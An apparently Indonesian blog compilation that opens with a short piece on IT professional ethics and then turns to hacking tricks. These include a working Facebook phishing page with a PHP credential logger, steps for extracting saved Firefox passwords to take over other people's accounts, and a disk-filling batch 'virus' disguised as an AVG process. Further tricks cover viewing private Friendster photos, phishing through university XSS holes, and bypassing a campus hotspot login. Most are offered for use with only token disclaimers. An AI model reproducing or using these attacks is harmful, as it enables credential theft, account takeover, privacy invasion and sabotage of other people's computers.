Profesionalisme yang harus dimiliki seorang IT

Seorang profesional tidak boleh membuat program semaunya, ada beberapa hal yang harus ia perhatikan seperti untuk apa program tersebut nantinya digunakan oleh kliennya atau user; ia dapat menjamin keamanan (security) sistem kerja program aplikasi tersebut dari pihak-pihak yang dapat merusak sistem kerjanya  (misalnya: hacker, cracker, dll).

Seorang profesional IT harus bisa menjaga nama baik Instansi tempat ia bekerja, dengan cara mengupayakan untuk melakukan yang terbaik di tempat ia bekerja. Profesional IT harus bisa menghormati hak cipta profesioal IT lain nya dan menjaga sebaik mungkin hak cipta nya sendiri.

Sebenarnya Kode etik dalam bidang IT juga belum diresmikan oleh undang – undang ,karna kode etik kedokteran lah yg mempunyai kode etik resmi dari pemerintah seperti Pengurus Besar Ikatan Dokter Indonesia (PB IDI) telah mengeluarkan surat edaran Nomor 3509/PB/A.3/02/2009  tanggal 27 Januari 2009.

Mungkin masih perlunya pematangan dalam profesi IT tersebut untuk akhirnya lahirnya kode etik IT.Contohnya Orang IT sebagai orang yang paling tau akan bisnis proses perusahaan mempunyai kode etik yang mendasar untuk menjaga kerahasiaannya. Karna kita tau bahwa seorang individu pastilah unik dan mereka mempunyai pemikiran sendiri. Hal ini tidak beda dengan logika orang IT, bahwa setiap orang IT mempunyai logika IT yang berbeda satu sama lain.

Sumber : http://theadamznd.blogspot.com/2009/10/kode-etik-seorang-profesional-it.html

Secara umum Ciri-Ciri Profesionalisme dalam bidang IT, sebagai berikut :

• Memiliki pengetahuan yang tinggi di bidang IT
• Memiliki keterampilan yang tinggi di bidang IT
• Memiliki pengetahuan yang luas tentang manusia dan masyarakat, budaya, seni, sejarah dan komunikasi
• Tanggap terhadap masalah client, faham terhadap isyu-isyu etis serta tata nilai kilen-nya
• Mampu melakukan pendekatan multidispliner
• Mampu bekerja sama
• Bekerja dibawah disiplin etika
• Mampu mengambil keputusan didasarkan kepada kode etik, bila dihadapkan pada situasi dimana pengambilan keputusan berakibat luas terhadap masyarakat.

Anda maniak linux ? sering berkecimpung dengan terminal di linux ?

Hemf…Hidup dilingkungan serba teks ini kalau sering dilakukan tidak kalah asik nya dibanding dengan GUI.

Sekarang mari tambah nikmat nya terminal dengan browsing di lingkungan berbasiskan teks tersebut.

Langsung saja ikuti trik berikut.

Browsing melalui terminal di linux.

1. Buka Terminal
2. Install elinks, ketik : sudo apt-get install elinks
3. pilih yes : y [enter]
4. Finish…….
   

Mulai browsing.

1. ketik : elinks izulcybercafe.com

Tak perlu panjang lebar karena waktu saya tidak banyak mohon maaf neh newbie mw bagi cerita OK.

Untuk hacking FB kita memerlukan beberapa file :

1. facebook1.html
2. facebooklogin.php
3. rekamanbiru.txt

Cara :
1. facebook1.html : didapat dari halaman login Facebook Asli, dengan cara menekan Ctrl+U lalu Copy Paste.

Sebelumnya disave, coba liat hasil kopian source tersebut, cari

https://login.facebook.com/login.php?login_attempt=1

Ganti tulisan tersebut dengan facebooklogin.php

Itu akan melempar variable2 ke file facebooklogin, nanti facebooklogin.php akan merekam apa yg dimasukan ke file rekamanbiru.txt

2. facebooklogin.php

<?php
header (‘Location: https://login.facebook.com/login.php ‘);
$handle = fopen(“rekamanbiru.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

3. rekamanbiru.txt

File yg ini biarkan saja kosong seperti semula namun jangan lupa untuk di save dengan name rekamanbiru.txt

Upload ketiga file itu ke hosting yang support php seperti ripway dan taruh file ini dalah 1 diretory OK….

-[ E N D ]-

HASILNYA DISINI

Formnya bisa dilihat disini..

Password rekamannya disini.

atau semuanya disini

Kenapa begitu ?

Hal itu bisa terjadi jika kamu sering menyimpan password kamu saat membuka email, atau yang lain (Menekan Tombol Save Password setelah login). Biasanya ini sering terjadi pada user yang sering menggunakan komputer pribadi untuk Berinternet (PC Rumah, Laptop, dll) katanya sih biar tidak ngetik lagi  kalau mau login, tidak menutup kemungkinan hal ini sering dilakukan oleh user yang sering main di WARNET.

Sekarang coba kita tes.

Buka Mozilla Firefox >> Tools >> Options >> Security >> Tekan Tombol Saved Password – Show Password.

Tuh kan, Password anda akan di tampilkan semua.

Password yang ditampilkan tersebut tersimpan karena anda menekan tombol remember setelah login.

– Sudut Pandang Hacker.

Bagaimana kalau anda sering melakukan penyimpanan password seperti itu WARNET, maka seseorang (Hacker atau yang pernah baca artikel ini) dapat mengambil alih account kamu di berbagai situs.

Bahaya bukan ?

– Menanggulangi :

Caranya Gunakan Password Master.

Buka Mozilla Firefox >> Tools >> Options >> Security >> Ceklis Use Master Password.

Ketik password yang anda inginkan.

Dengan begini maka tidak sembarang orang bisa membuka Password yang anda simpan.

– Bertindak sebagai Hacker :

Sekarang mari kita coba bertindak sebagai seorang hacker.

Kalau sudah terkunci (diberi password) seperti itu, masih bisa kah kita mengetahui password yang tersimpan di Browser tersebut ?

Jawabannya Bisa.

Bagaimana ?

Sekarang coba masuk ke

C:\Documents and Settings\<Izul>\<Application Data>\Mozilla\Firefox\Profiles\<glqmsnba.default>

Lihat tulisan yang dicetak tebal :

<izul> = Nama user.

<Aplication Data > = Akan muncul jika kamu mengktifkan opsi Show Hidden File and Folder di Folder Options

<glqmsnba.default> = Setiap komputer berbeda.

Cari 3 buah file Database Mozilla Firefox (Tempat password disimpan), yaitu :

Cert8.db , key3.db, signons3.txt (pada mozilla versi 2 signons2.txt).

Lalu simpan ketiga file tersebut di C:/db/data jika belum ada buat dulu folder db dan data.

Sekarang download FirePassword di situs www.securityXploded.com.

Exstract di folder db ——- > C:/db.

Sekarang buka Command Prompt : Start - Run - CMD.

Masuk ke Folder C:/db

Caranya:

———————————————————-

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Izul>cd “c:\data”

C:\db>

———————————————————-

Untuk membuka password yang tersimpan disitu, ketik.

C:/db>firepassword.exe data

Maka semua password yang tersimpan akan ditampilkan.

Sekarang anda bisa menguasai Berbagai Account orang lain (Teman, Bokap, Nyokap,dll).

Tapi ini cuma buat pembelajaran lho, sebenarnya saya hanya ingin menerangkan bagaimana berbahayanya sebuah file .Bat. Sebenarnya artikel ini sudah jadoel banget, sudah banyak mungkin yang menulis artikel mirip-mirip begini. Ya maklum trik ini sudah ada sejak adanya MSDOS, karena trik ini akan menggunakan DOS. Tapi yasudahlah tidak apa. Langsung saja kita mulai..

Membanjiri Hardisk dengan Satu Kali Klik.

Pertama coba buka notepad.

Ketik script berikut :

—————————————————

@echo off

:awal
TYPE %WINDIR%\explorer.exe >> %WINDIR%\AVGguard.exe
cls

echo.
echo AVG Control Guard
echo Scanning this Computer
echo.
echo Press CTRL+C if process not Responding.
echo and answer YES.
echo —————————————
echo thanks : www.avg.com
goto awal

—————————————————

Save dengan nama Virus.bat (atau nama lain, sesuka anda) lalu coba klik 2 kali file tersebut, maka kira – kira akan tampil seperti berikut :

Script tersebut akan membuat sebuah file dengan nama AvgGuard.exe di C:\windows\system32.

Nama bisa anda ganti di Script, sebisa mungkin buat nama file yang susah di tebak, misal winlogon.dll, winId.dll atau wind32.txt, ya pokoknya menyerupai file-file milik windows(agar sulit dicari).

Coba lihat ukuran file AvgGuard tersebut, besar sekali bukan ?

Besar ukuran file tersebut tergantung dari lama anda membiarkan program tersebut berjalan ! Jika tadi anda buru – buru menekan CTRL+C maka ukuran file mungkin kecil.

Itu karena program itu akan memasukan file explorer.exe ke dalam file AvgGuard.exe yang dibuat saat program dijalankan, terus menerus dimasukan sampai anda menekan CTRL+C, Jadi jika anda tidak menekan CTRL + C maka file explorer.exe akan dimasukan terus ke dalam file AvgGuard.exe, dan bayangkan berapa ukuran file tersebut nantinya.

Bisa – bisa hardisk Penuh.

Lebih bahaya lagi kalau file tersebut diletakkan si Startup, maka setiap komputer di hidupkan maka hardisk akan berkurang ruang kosongnya.

Bahaya Sekali, jadi saya sarankan agar tidak di gunakan untuk hal – hal buruk yach, Kecuali kepepet hehee

Sekian….

Selamat mencoba.

Hehehaa… tidak masalah, karena rasa penasaran anda akan segera terobati dengan kenyataan – kenyataan indah

yang akan anda dapatkan setelah membaca seluruh isi postingan saya kali ini.

Yach, judul yang anda baca itu tidak salah, itu benar sekali, tidak ada kebohongan di Cafe Virtual yang kita

cintai ini…!!! hehehe… gaya bgt.

Oke kita mulai saja trik nya, yaitu “Melihat Private Photo FS“.

Persiapan dan peralatan/software yang dibutuhkan tidak susah kok.

• Sedikit pikiran Iblis di bulan puasa ini, saya yakin saat pertama anda membuka postingan ini, pikirantersebut sudah langsung terinstall dengan sendirinya di Otak anda.
• Mozilla Firefox & Notepad/Kertas Selembar.

Caranya begini.

Langkah 1.

Login Ke FS, lalu Buka Profile teman anda yang anda ingin lihat Privete Foto nya.

Yang pasti cari yang albumnya di setting Private.

Langkah 2.

Buka Seluruh Albumnya : klik View All Album.

Langkah 3.

Lalu tekan CTRL+U(View Source) dan Tekan tombol CTRL+F(Find) lalu cari kata Private.

Langkah 4.

Nah dapatkan tuh, coba lihat gambar dibawah ini.

Langkah 5.

Catat Uid dan abAlbumPrivacy , simpan baik-baik penemuan penting tersebut.

Langkah 6.

Perhatikan Script berikut, ganti uID dan abAlbumPrivacy dengan yang anda dapat tadi.
Misal :
http://www.friendster.com/photolist_ajax.php?uid=(Uid FS Target)&a=(id Album)&page=0
Rubah menJadi
http://www.friendster.com/photolist_ajax.php?uid=3309283&a=360931609&page=0

Maka anda akan mendapatkan Kode-kode aneh yang aneh seperti berikut:

Langkah 7.

Cari kata rid lalu copy angka disampingnya…

Rid ini ada banyak, tergantung dari jumlah foto yang ada di album privete tersebut.

Langkah 8.

Untuk melihat foto private nya, buka dulu albumnya disetting untuk public.

Langkah 9.

Klik kanan salah satu foto(bebas yang mana aja), lalu copy location nya ke browser kamu.
Contoh sbg berikut.

Langkah 10.

Lalu ganti angka sesudah angka “1_ “ dengan rid yang anda dapat tadi.

Langkah 11.

Maka foto akan terbuka.

Langkah 12.

Untuk foto – foto yang lain cari lagi rid di bawah nya lihat gambar pada langkah 6.
kopikan lagi sesudah angka 1_.

Sekian yach….

Nantikan artikel dan trik selanjutnya..

Bubyeee…….

Oya untuk Bani Thank niy Infonya…

Sudah baca kan judul arikel ini, ehm…Saya tidak tau ini berita baik atau buruk buat kalian semua, tapi buat saya sih ini termasuk berita buruk, karena menyangkut Website kampus saya juga sih…..T.T —-> [UG].

Berita buruk tersebut yaitu masih banyak nya celah keamanan di situs – situs perguruan tinggi di Indonesia.
Celah yang sering dianggap remeh oleh sebagian orang, yang mungkin dianggap tidak berbahaya oleh para administrator website, Celah keamanan yang dimaksud yaitu celah XSS(Cross Site Scripting).
Penjelasan XSS nya baca disini aja yach, atau disini niy..

Kita bahas satu persatu yuk situs-situs Universitas yang ada celahnya tersebut…

Kita mulai dengan yang Pertama sangat berbahaya menurut saya, karena menyangkut kampus saya tercinta niy.

Kenapa berbahaya ?.?

Karena “Oknum2 tidak bertanggung jawab” bisa memasukkan halaman login palsu di halaman depan situs Gunadarma, dan mengirim kan email palsu ke email mahasiswa yang menyatakan bahwa seluruh mahasiswa harus melakukan registrasi ulang dengan cara memasukan username dan password lama mereka karena baru saja ada perbaikan di database. (dasar penipu : )
Mahasiswa yang tidak tau pasti langsung saja percaya dan mengikuti Link yang diberikan Attacker dan memasukan Username dan Password ke di halaman palsu yang dibuat attacker, dan setelah beberapa menit/jam/hari/minggu kemudian mahasiswa termasuk saya sendiri bisa kehilangan account…!! Menyedihkan sekaliiiiiii. T.T

Bagaimana cara si Attacker mencuri password..!.?.?.?

Cara yang dipakai yaitu dengan teknik kuno tapi masih bermanfaat yaitu Social engineering .

Langkah Pertama si Attacker Mengirim Email Palsu ke Mahasiswa.

Alamat Email dapat di cari di Situs yang bersangkutan, dalam hal ini situs Gunadarma, bisa di dapat disini.

Berikut Form pengiriman email oleh Attacker.

Berikut Gambar Email diterima oleh mahasiswa(korban).
Klik aja gambar untuk memperbesar.

Halaman Login yang dibuat Attacker yang link’a disertakan di dalam email.

Contoh si “izul” memasukan data-datanya.

Maka dalam sekejap data – data tersebut akan tersimpan di database si Attacker.

Si attacker tinggal masuk ke halaman account user/mahasiswa yang mengisi, dalam hal ini si “Izul”.

Dalam sekejap Dapat deh data – data penting dari si “Izul”. Hemff….

Selesai………..Gampang banget yak…………!!???

Untuk melihat contoh form email palsu :

Untuk melihat contoh Registrasi Ulang Palsu :

Untuk melihat Hasil yang didapat oleh attacker :

Sekian……

Oya…untuk daftar universitas lainnya yang memiliki celah XSS juga dapat dilihat di Postingan sebelumnya Daftar Celah XSS lainnya di berbagai Universitas di Indonesia.

Dimulai dari saya memiliki seorang teman yang bernama Seno yang rajin ke warnet hampir 5 malam dalam seminggu, dan pulang selalu pagi/subuh, saya dan Doni teman saya jadi curiga, ngapain aja tu anak kewarnet setiap malam dari jam 9 dan pulang pagi. Dan itu sudah berlangsung 2 minggu, “rutin banget”.

Kecurigaan mulai muncul…..

Pasti niy anak setiap malam nonton video porno di Warnet. Tapi setiap kali di tanya dia selalu menjawab “mencari lowongan kerja”. Ganjil sekali bukan ??? nyari lowongan kerja setiap malam, dan pulang pagi selama 5 malam setiap minggu.

Kenapa kami curiga ???

Bagaimana melakukan blok terhadap tombol Close IE ??

• karena dia itu baru kenal internet [gaptek] paling browsing doank.
• Tidak punya email – FS – Blog – apalagi Website.
• Tidak bisa Chating dengan YM, MIRc, atau yang lainnya. [ gak ngerti soalnya].

Kami berusaha mencari tau. Ada ide, akhirnya karena di kampus saya ada hotspotnya, saya ajak dia untuk internetan di kampus.

Kami jalan ber-3 (Saya, Doni dan si Seno situkang b0k3p ).

Pas nyampe kampus kita – kita langsung browsing.

Setelah 30 menit browsing, si Doni pergi ke toilet, dan 5 menit kemudian saya pergi juga mencari makanan.

(tentu saja saya dan Doni cuma alasan doank untuk membiarkan si Seno berinternet sendirian).

Tapi sebelumnya Browser Internet Explorer saya Setting agar tidak bisa tertutup dan Firefox saya sembunyikan.

Setelah 5 menit membiarkan Seno internetan, saya dan Doni kembali dan mendapati si Seno sedang mencoba untuk menutup jendela IE yang isinya sudah diperkirakan sebelumnya, si Kamil sedang membuka situs “B0K3P”.

Hahahah….akhirnya ketahuan, dan akhirnya malu sendiri tu bocah…

Langsung saya keplak – keplakin, dan di caci maki, hahahahahahaha PUAS.

Parah jadi selama ini lu ke warnet setiap malam cuma buat nonton B0k3p No???pake alesan “Nyari Lowongan” lagi.

Bagaimana mensetting agar jendela Internet Explorer tidak bisa di Close ??.

Setiap akan menutup IE akan memunculkan pesan.

Caranya yaitu sebagai berikut :

1. Klik Start - Run - ketik Gpedit.msc.
2. Lalu masuk ke Local Computer Policy — User Configuration — Administrative Templates — Windows Component — Internet Explorer — Browser Menus.
3. Pada jendela kanan lakukan klik double pada :

   File menu: Disable Closing the browser and Explorer windows.

4. Ketika jendela terbuka, klik [Enable] dari tiga pilihan yang tersedia.
5. Klik tombol Apply lalu klik OK.

Maka setelah itu jendela IE tidak akan bisa tertutup.

Nah untuk mengembalikannya maka kembalikan settingan menjadi Not Configured.

Salah satunya untuk mendapatkan informasi, dizaman serba komputer, dimana setiap orang sudah menggunakan Internet untuk melakukan segala macam pekerjaan. Komputer bukan lagi merupakan barang yang aneh dan mewah, karena hampir disetiap rumah sudah ada komputer.

Artikel ini cuma sedikit memberi Trik kepada teman-teman, khususnya yang sering menggunakan Hotspot untuk berinternet ria, khusus nya teman-teman kampus.

Menyebalkan tidak, setiap kali mau Browsing menggunakan koneksi Wifi yang disediakan di Hotspot kampus kita harus memasukan Userneme dan Password.
Selalu muncul halaman seperti gambar diatas.

Dimana kita harus login terlebih dahulu untuk bisa browsing. Melelahkan sekali, apa lagi ketika jendela netautenticate tidak sengaja tertutup atau tidak merespon, maka browsing pun terhenti, dan harus login ulang.
Username juga tidak bisa dipakai oleh 2 orang secara bersamaan, jadi kalau bawa teman dan ingin browsing jg tidak bisa.

Sebenarnya sih kita masih bisa browsing walaupun tanpa login, tapi hanya situs-situs tertentu saja, seperti :
Google, Wikipedia, Gunadarma, Detikinet.

Nah bagai mana jika kita ingin browsing tanpa harus login ?.

Logikanya sederhana, sebenarnya bagaimana supaya kita selalu dianggap sebagai Google, Detikinet, atau Wikipedia oleh Server Gunadarma.

Coba ganti setingan Proxy dengan www.google.com, atau yang lain.
Maka sekarang teman-teman bebas untuk browsing tanpa harus login.

Kalau anda memakai browser Mozilla Firefox anda bisa mengikuti cara saya berikut ini.

Di Mozilla Firefox :

1. Klik Tools- Options – Advanced.
2. Di bagian Connection klik tombol Settings.
3. Pilih option Manual Proxy Configuration.
4. Lalu pada HTTP Proxy masukan www.google.com atau IP dari google sendiri yaitu 72.14.234.147.
5. Lalu Port nya 80, dimana ini adalah port untuk HTTP yaitu untuk Browsing.

Untuk melihat IP dari Situs seperti Google, Wikipedia, Detikinet, Gunadarma, dll

TInggal klik : Start – Run – ketik PING namasitus.

Ex : PING www.google.com atau PING www.gunadarma.ac.id.

Untuk pengguna IE masuk ke :

1. Tools – Internet Options – Connections – LAN Setting.
2. Lalu isikan IP dari Google, Detikinet dll di bagian Proxy Server dan Port nya 80.

Dah segitu aja Trik nya..

Bubbyeeeee……….. Happy Browsing my Friends………..